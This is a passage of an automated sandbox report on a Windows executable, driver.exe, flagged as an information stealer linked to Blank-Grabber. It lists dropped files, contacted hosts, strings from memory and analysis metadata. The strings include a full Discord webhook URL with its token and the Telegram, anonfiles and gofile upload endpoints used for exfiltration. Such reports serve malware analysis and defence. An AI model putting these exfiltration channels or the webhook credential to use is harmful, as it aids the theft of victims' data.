C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-core-file-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-core-file-l1-2-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-core-file-l2-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-core-handle-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-core-heap-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-core-interlocked-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-core-libraryloader-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-core-localization-l1-2-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-core-memory-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-core-namedpipe-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-core-processenvironment-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-core-processthreads-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-core-processthreads-l1-1-1.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-core-profile-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-core-rtlsupport-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-core-string-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-core-synch-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-core-synch-l1-2-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-core-sysinfo-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-core-timezone-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-core-util-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-crt-conio-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-crt-convert-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-crt-environment-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-crt-filesystem-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-crt-heap-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-crt-locale-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-crt-math-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-crt-process-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-crt-runtime-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-crt-stdio-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-crt-string-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-crt-time-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-crt-utility-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI57082\libcrypto-3.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI57082\libffi-8.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI57082\libssl-3.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI57082\python313.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exe	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI57082\select.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI57082\sqlite3.dll	0%	ReversingLabs

Name	IP	Active	Malicious	Antivirus Detection	Reputation
discord.com	162.159.137.232	true	false		high
ip-api.com	208.95.112.1	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://discord.com/api/webhooks/1326920011201118251/xRN_dhCbCT8HeZRae0xJk1yw1sh06GaK4mq7ylVag5fFfCbHC0_LWfgjquGILOcXtJ2V	false

URLs from Memory and Binaries

Name	Source	Malicious
https://duckduckgo.com/chrome_newtab	driver.exe, 00000002.00000003.2334802815.000001C0EE22F000.00000004.00000020.00020000.00000000.sdmp	false
https://github.com/Blank-c/BlankOBF	driver.exe, 00000002.00000003.2075105413.000001C0EE390000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2075481940.000001C0EE09C000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2075373068.000001C0EE044000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2075977793.000001C0EE0A3000.00000004.00000020.00020000.00000000.sdmp	false
https://www.avito.ru/	driver.exe, 00000002.00000002.2442424891.000001C0EE7D4000.00000004.00001000.00020000.00000000.sdmp	false
https://duckduckgo.com/ac/?q=	driver.exe, 00000002.00000003.2334802815.000001C0EE22F000.00000004.00000020.00020000.00000000.sdmp	false
https://api.telegram.org/bot	driver.exe, 00000002.00000002.2439477041.000001C0EDE90000.00000004.00001000.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2076357362.000001C0EE03E000.00000004.00000020.00020000.00000000.sdmp	false
https://github.com/Blank-c/Blank-Grabberi	driver.exe, 00000002.00000003.2076357362.000001C0EE03E000.00000004.00000020.00020000.00000000.sdmp	false
http://crl.microsoft	powershell.exe, 0000002F.00000002.2321765178.0000028FF8040000.00000004.00000020.00020000.00000000.sdmp	false
https://www.ctrip.com/	driver.exe, 00000002.00000003.2329743274.000001C0EEED4000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000002.2442424891.000001C0EE828000.00000004.00001000.00020000.00000000.sdmp	false
http://www.microsoft.co	powershell.exe, 0000002F.00000002.2315796197.0000028FF5F66000.00000004.00000020.00020000.00000000.sdmp	false
https://g.live.com/odclientsettings/ProdV2.C:	svchost.exe, 00000030.00000003.2157180555.000002106B800000.00000004.00000800.00020000.00000000.sdmp	false
https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#	driver.exe, 00000002.00000002.2437809693.000001C0EBD9A000.00000004.00000020.00020000.00000000.sdmp	false
https://www.leboncoin.fr/	driver.exe, 00000002.00000002.2442424891.000001C0EE828000.00000004.00001000.00020000.00000000.sdmp	false
https://packaging.python.org/en/latest/specifications/recording-installed-packages/#the-record-file	driver.exe, 00000002.00000003.2149672861.000001C0EE151000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000002.2439933972.000001C0EE152000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2435979821.000001C0EE152000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2188298866.000001C0EE14B000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2335408296.000001C0EE14B000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2434711716.000001C0EE152000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2126069421.000001C0EE289000.00000004.00000020.00020000.00000000.sdmp	false
https://tools.ietf.org/html/rfc2388#section-4.4	driver.exe, 00000002.00000003.2435146578.000001C0EE0B3000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000002.2439933972.000001C0EE0B3000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2189780430.000001C0EE0B3000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2335486016.000001C0EE0AE000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2150956098.000001C0EE0B3000.00000004.00000020.00020000.00000000.sdmp	false
https://docs.python.org/3.11/library/binascii.html#binascii.a2b_base64	driver.exe, 00000002.00000002.2438725713.000001C0ED950000.00000004.00000020.00020000.00000000.sdmp	false
https://weibo.com/	driver.exe, 00000002.00000002.2442424891.000001C0EE828000.00000004.00001000.00020000.00000000.sdmp	false
https://api.anonfiles.com/upload	driver.exe, 00000002.00000002.2439477041.000001C0EDE90000.00000004.00001000.00020000.00000000.sdmp	false
https://packaging.python.org/en/latest/specifications/entry-points/#file-format	driver.exe, 00000002.00000003.2149672861.000001C0EE151000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000002.2439933972.000001C0EE152000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2435979821.000001C0EE152000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2188298866.000001C0EE14B000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2335408296.000001C0EE14B000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2434711716.000001C0EE152000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2126069421.000001C0EE289000.00000004.00000020.00020000.00000000.sdmp	false
https://www.msn.com	driver.exe, 00000002.00000002.2445265789.000001C0EF768000.00000004.00001000.00020000.00000000.sdmp	false
https://nuget.org/nuget.exe	powershell.exe, 0000000E.00000002.2243088797.000001A9C5C53000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002F.00000002.2310314643.0000028F901BD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002F.00000002.2261891481.0000028F8196B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002F.00000002.2310314643.0000028F9007A000.00000004.00000800.00020000.00000000.sdmp	false
https://discord.com/api/v9/users/	driver.exe, 00000002.00000003.2076357362.000001C0EE03E000.00000004.00000020.00020000.00000000.sdmp	false
https://github.com/urllib3/urllib3/issues/2192#issuecomment-821832963	driver.exe, 00000002.00000002.2441846690.000001C0EE490000.00000004.00001000.00020000.00000000.sdmp	false
http://cacerts.digi	driver.exe, 00000000.00000003.2058474705.000001C6D7270000.00000004.00000020.00020000.00000000.sdmp	false
https://github.com/Blank-c/Blank-Grabberr#	driver.exe, 00000002.00000003.2076357362.000001C0EE03E000.00000004.00000020.00020000.00000000.sdmp	false
https://peps.python.org/pep-0205/	driver.exe, 00000002.00000003.2065257439.000001C0ED951000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000002.2439477041.000001C0EDE90000.00000004.00001000.00020000.00000000.sdmp	false
https://www.reddit.com/	driver.exe, 00000002.00000002.2442424891.000001C0EE828000.00000004.00001000.00020000.00000000.sdmp	false
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 0000000E.00000002.2214718488.000001A9B5BE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002F.00000002.2261891481.0000028F80001000.00000004.00000800.00020000.00000000.sdmp	false
https://docs.python.org/3/library/importlib.html#importlib.abc.ExecutionLoader.get_filename	driver.exe, 00000002.00000002.2438725713.000001C0ED950000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000002.2438237323.000001C0ED6C0000.00000004.00001000.00020000.00000000.sdmp	false
https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxy	driver.exe, 00000002.00000002.2441997627.000001C0EE590000.00000004.00001000.00020000.00000000.sdmp	false
https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688	driver.exe, 00000002.00000002.2438237323.000001C0ED744000.00000004.00001000.00020000.00000000.sdmp	false
https://www.ebay.co.uk/	driver.exe, 00000002.00000003.2329743274.000001C0EEED4000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000002.2442424891.000001C0EE828000.00000004.00001000.00020000.00000000.sdmp	false
http://pesterbdd.com/images/Pester.png	powershell.exe, 0000002F.00000002.2261891481.0000028F8022A000.00000004.00000800.00020000.00000000.sdmp	false
http://schemas.xmlsoap.org/soap/encoding/	powershell.exe, 0000000E.00000002.2214718488.000001A9B5E0A000.00000004.00000800.00020000.00000000.sdmp	false
https://www.ebay.de/	driver.exe, 00000002.00000002.2442424891.000001C0EE828000.00000004.00001000.00020000.00000000.sdmp	false
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 0000002F.00000002.2261891481.0000028F8022A000.00000004.00000800.00020000.00000000.sdmp	false
https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_code	driver.exe, 00000002.00000002.2438237323.000001C0ED6C0000.00000004.00001000.00020000.00000000.sdmp	false
https://go.micro	powershell.exe, 0000002F.00000002.2261891481.0000028F80ED7000.00000004.00000800.00020000.00000000.sdmp	false
https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader	driver.exe, 00000002.00000002.2437809693.000001C0EBD9A000.00000004.00000020.00020000.00000000.sdmp	false
https://www.amazon.com/	driver.exe, 00000002.00000003.2329743274.000001C0EEED4000.00000004.00000020.00020000.00000000.sdmp	false
https://github.com/python/cpython/issues/86361.	driver.exe, 00000002.00000003.2435146578.000001C0EE0B3000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000002.2439933972.000001C0EE0B3000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2189780430.000001C0EE0B3000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2335486016.000001C0EE0AE000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000002.2438725713.000001C0ED9B7000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2079997123.000001C0EE0D4000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2150956098.000001C0EE0B3000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2078386891.000001C0EE0E3000.00000004.00000020.00020000.00000000.sdmp	false
https://contoso.com/Icon	powershell.exe, 0000002F.00000002.2310314643.0000028F9007A000.00000004.00000800.00020000.00000000.sdmp	false
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	driver.exe, 00000002.00000003.2334802815.000001C0EE22F000.00000004.00000020.00020000.00000000.sdmp	false
https://httpbin.org/	driver.exe, 00000002.00000003.2126069421.000001C0EE289000.00000004.00000020.00020000.00000000.sdmp	false
http://crl.ver)	svchost.exe, 00000030.00000002.3296597335.000002106B600000.00000004.00000020.00020000.00000000.sdmp	false
http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s	driver.exe, 00000000.00000003.2059613372.000001C6D7270000.00000004.00000020.00020000.00000000.sdmp	false
https://docs.python.org/3/library/importlib.html#importlib.abc.Loader.exec_module	driver.exe, 00000002.00000002.2438237323.000001C0ED6C0000.00000004.00001000.00020000.00000000.sdmp	false
https://docs.python.org/3/library/importlib.html#importlib.abc.MetaPathFinder.invalidate_caches	driver.exe, 00000002.00000002.2438237323.000001C0ED6C0000.00000004.00001000.00020000.00000000.sdmp	false
https://www.ecosia.org/newtab/	driver.exe, 00000002.00000003.2334802815.000001C0EE22F000.00000004.00000020.00020000.00000000.sdmp	false
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	driver.exe, 00000002.00000003.2103195176.000001C0EE371000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2126069421.000001C0EE2CD000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2126069421.000001C0EE35F000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2107373008.000001C0EED93000.00000004.00000020.00020000.00000000.sdmp	false
https://www.youtube.com/	driver.exe, 00000002.00000003.2329743274.000001C0EEED4000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000002.2442424891.000001C0EE828000.00000004.00001000.00020000.00000000.sdmp	false
https://allegro.pl/	driver.exe, 00000002.00000002.2442424891.000001C0EE828000.00000004.00001000.00020000.00000000.sdmp	false
https://github.com/Pester/Pester	powershell.exe, 0000002F.00000002.2261891481.0000028F8022A000.00000004.00000800.00020000.00000000.sdmp	false
http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l535	driver.exe, 00000002.00000003.2435146578.000001C0EE0B3000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2334802815.000001C0EE235000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000002.2439933972.000001C0EE0B3000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2189780430.000001C0EE0B3000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2335486016.000001C0EE0AE000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2435979821.000001C0EE237000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000002.2439933972.000001C0EE237000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2150956098.000001C0EE0B3000.00000004.00000020.00020000.00000000.sdmp	false
https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_sy	driver.exe, 00000002.00000002.2437809693.000001C0EBD9A000.00000004.00000020.00020000.00000000.sdmp	false
https://MD8.mozilla.org/1/m	driver.exe, 00000002.00000002.2442424891.000001C0EE828000.00000004.00001000.00020000.00000000.sdmp	false
https://packaging.python.org/en/latest/specifications/core-metadata/#core-metadata	driver.exe, 00000002.00000002.2441997627.000001C0EE590000.00000004.00001000.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2126069421.000001C0EE289000.00000004.00000020.00020000.00000000.sdmp	false
https://www.bbc.co.uk/	driver.exe, 00000002.00000002.2442424891.000001C0EE828000.00000004.00001000.00020000.00000000.sdmp	false
https://bugzilla.mo	driver.exe, 00000002.00000002.2442424891.000001C0EE7D8000.00000004.00001000.00020000.00000000.sdmp	false
https://github.com/python/importlib_metadata/wiki/Development-Methodology	driver.exe, 00000002.00000002.2442254486.000001C0EE6B0000.00000004.00001000.00020000.00000000.sdmp	false
http://tools.ietf.org/html/rfc6125#section-6.4.3	driver.exe, 00000002.00000002.2442254486.000001C0EE6B0000.00000004.00001000.00020000.00000000.sdmp	false
http://schemas.xmlsoap.org/wsdl/	powershell.exe, 0000000E.00000002.2214718488.000001A9B5E0A000.00000004.00000800.00020000.00000000.sdmp	false
https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL	driver.exe, 00000002.00000003.2335617765.000001C0EE35D000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2191367596.000001C0EE35F000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2126069421.000001C0EE2CD000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2126069421.000001C0EE35F000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2143041528.000001C0EE35F000.00000004.00000020.00020000.00000000.sdmp	false
https://google.com/mail	driver.exe, 00000002.00000002.2438725713.000001C0ED9B7000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000002.2438981271.000001C0EDBD4000.00000004.00000020.00020000.00000000.sdmp	false
https://packaging.python.org/specifications/entry-points/	driver.exe, 00000002.00000002.2441846690.000001C0EE490000.00000004.00001000.00020000.00000000.sdmp, driver.exe, 00000002.00000002.2441997627.000001C0EE590000.00000004.00001000.00020000.00000000.sdmp	false
https://www.python.org/psf/license/)	driver.exe, 00000002.00000002.2449988563.00007FF8A8BD9000.00000040.00000001.01000000.00000005.sdmp	false
https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.py	driver.exe, 00000002.00000002.2437809693.000001C0EBD9A000.00000004.00000020.00020000.00000000.sdmp	false
https://www.google.com/	driver.exe, 00000002.00000003.2329743274.000001C0EEED4000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000002.2442424891.000001C0EE828000.00000004.00001000.00020000.00000000.sdmp	false
https://www.iqiyi.com/	driver.exe, 00000002.00000002.2442424891.000001C0EE828000.00000004.00001000.00020000.00000000.sdmp	false
https://foss.heptapod.net/pypy/pypy/-/issues/3539	driver.exe, 00000002.00000002.2441846690.000001C0EE490000.00000004.00001000.00020000.00000000.sdmp	false
https://github.com/urllib3/urllib3/issues/2513#issuecomment-1152559900.	driver.exe, 00000002.00000002.2439604035.000001C0EDF90000.00000004.00000020.00020000.00000000.sdmp	false
http://google.com/	driver.exe, 00000002.00000002.2438981271.000001C0EDBD4000.00000004.00000020.00020000.00000000.sdmp	false
http://ocsp.sectigo.com0	driver.exe, 00000000.00000003.2059613372.000001C6D7270000.00000004.00000020.00020000.00000000.sdmp	false
https://tools.ietf.org/html/rfc7231#section-4.3.6)	driver.exe, 00000002.00000003.2079997123.000001C0EE114000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000002.2439604035.000001C0EDF90000.00000004.00000020.00020000.00000000.sdmp	false
https://api.gofile.io/getServerr~	driver.exe, 00000002.00000003.2076357362.000001C0EE03E000.00000004.00000020.00020000.00000000.sdmp	false
https://contoso.com/License	powershell.exe, 0000002F.00000002.2310314643.0000028F9007A000.00000004.00000800.00020000.00000000.sdmp	false
https://discordapp.com/api/v9/users/	driver.exe, 00000002.00000002.2439477041.000001C0EDE90000.00000004.00001000.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2076357362.000001C0EE03E000.00000004.00000020.00020000.00000000.sdmp	false
https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_source	driver.exe, 00000002.00000002.2438237323.000001C0ED744000.00000004.00001000.00020000.00000000.sdmp	false
http://ip-api.com/json/?fields=225545r	driver.exe, 00000002.00000003.2076357362.000001C0EE03E000.00000004.00000020.00020000.00000000.sdmp	false
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	driver.exe, 00000002.00000003.2334802815.000001C0EE22F000.00000004.00000020.00020000.00000000.sdmp	false
https://docs.python.org/3/library/importlib.html#importlib.abc.PathEntryFinder.find_spec	driver.exe, 00000002.00000002.2438237323.000001C0ED6C0000.00000004.00001000.00020000.00000000.sdmp	false
https://github.com/urllib3/urllib3/issues/2920	driver.exe, 00000002.00000002.2442254486.000001C0EE6B0000.00000004.00001000.00020000.00000000.sdmp	false
http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#	driver.exe, 00000000.00000003.2059613372.000001C6D7270000.00000004.00000020.00020000.00000000.sdmp	false
https://api.gofile.io/getServerr~r	driver.exe, 00000002.00000003.2076357362.000001C0EE03E000.00000004.00000020.00020000.00000000.sdmp	false
https://docs.python.org/3/library/importlib.html#importlib.abc.ResourceLoader.get_data	driver.exe, 00000002.00000002.2438725713.000001C0ED950000.00000004.00000020.00020000.00000000.sdmp	false
https://yahoo.com/	driver.exe, 00000002.00000002.2438725713.000001C0ED9B7000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000002.2438981271.000001C0EDBD4000.00000004.00000020.00020000.00000000.sdmp	false
https://account.bellmedia.c	driver.exe, 00000002.00000002.2445265789.000001C0EF73C000.00000004.00001000.00020000.00000000.sdmp	false
http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-6	driver.exe, 00000002.00000002.2438981271.000001C0EDCB2000.00000004.00000020.00020000.00000000.sdmp	false
https://login.microsoftonline.com	driver.exe, 00000002.00000002.2445265789.000001C0EF73C000.00000004.00001000.00020000.00000000.sdmp	false
http://crl.thawte.com/ThawteTimestampingCA.crl0	driver.exe, 00000000.00000003.2059613372.000001C6D7270000.00000004.00000020.00020000.00000000.sdmp	false
https://html.spec.whatwg.org/multipage/	driver.exe, 00000002.00000003.2334802815.000001C0EE28A000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2434655198.000001C0EE28A000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000002.2440748716.000001C0EE28A000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2149413068.000001C0EE28A000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2187487216.000001C0EE28A000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2126069421.000001C0EE289000.00000004.00000020.00020000.00000000.sdmp	false
https://www.ifeng.com/	driver.exe, 00000002.00000002.2442424891.000001C0EE828000.00000004.00001000.00020000.00000000.sdmp	false
https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warnings	driver.exe, 00000002.00000002.2441997627.000001C0EE590000.00000004.00001000.00020000.00000000.sdmp	false
https://www.zhihu.com/	driver.exe, 00000002.00000002.2442424891.000001C0EE828000.00000004.00001000.00020000.00000000.sdmp	false
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	driver.exe, 00000002.00000003.2334802815.000001C0EE22F000.00000004.00000020.00020000.00000000.sdmp	false
https://www.rfc-editor.org/rfc/rfc8259#section-8.1	driver.exe, 00000002.00000003.2435146578.000001C0EE0B3000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000002.2439933972.000001C0EE0B3000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2189780430.000001C0EE0B3000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2335486016.000001C0EE0AE000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2150956098.000001C0EE0B3000.00000004.00000020.00020000.00000000.sdmp	false
https://contoso.com/	powershell.exe, 0000002F.00000002.2310314643.0000028F9007A000.00000004.00000800.00020000.00000000.sdmp	false
https://oneget.orgX	powershell.exe, 0000002F.00000002.2261891481.0000028F81653000.00000004.00000800.00020000.00000000.sdmp	false
https://api.gofile.io/getServer	driver.exe, 00000002.00000002.2439477041.000001C0EDE90000.00000004.00001000.00020000.00000000.sdmp	false
https://raw.githubusercontent.com/Blank-c/Blank-Grabber/main/.github/workflows/image.png	driver.exe, 00000002.00000002.2440748716.000001C0EE2E1000.00000004.00000020.00020000.00000000.sdmp	false

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
208.95.112.1	ip-api.com	United States		53334	TUT-ASUS	false
162.159.137.232	discord.com	United States		13335	CLOUDFLARENETUS	false

Private

IP
127.0.0.1

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1587410
Start date and time:	2025-01-10 10:59:11 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 13m 9s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	100
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	driver.exe
Detection:	MAL
Classification:	mal100.rans.troj.spyw.expl.evad.winEXE@161/105@2/3
EGA Information:	Successful, ratio: 50%
HCA Information:	Successful, ratio: 91% Number of executed functions: 111 Number of non-executed functions: 177
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, WmiPrvSE.exe
Excluded IPs from analysis (whitelisted): 142.250.186.163, 20.109.210.53, 184.28.90.27, 13.95.31.18, 20.242.39.171, 13.107.246.45
Excluded domains from analysis (whitelisted): fs.microsoft.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, ocsp.digicert.com, 6.0.1.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.7.0.0.0.0.3.0.1.3.0.6.2.ip6.arpa, e16604.g.akamaiedge.net, gstatic.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, prod.fs.microsoft.com.akadns.net, glb.sls.prod.dcat.dsp.trafficmanager.net
Execution Graph export aborted for target mshta.exe, PID 5396 because there are no executed function
Execution Graph export aborted for target powershell.exe, PID 3560 because it is empty
Execution Graph export aborted for target powershell.exe, PID 5652 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtCreateFile calls found.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtEnumerateKey calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtQueryVolumeInformationFile calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

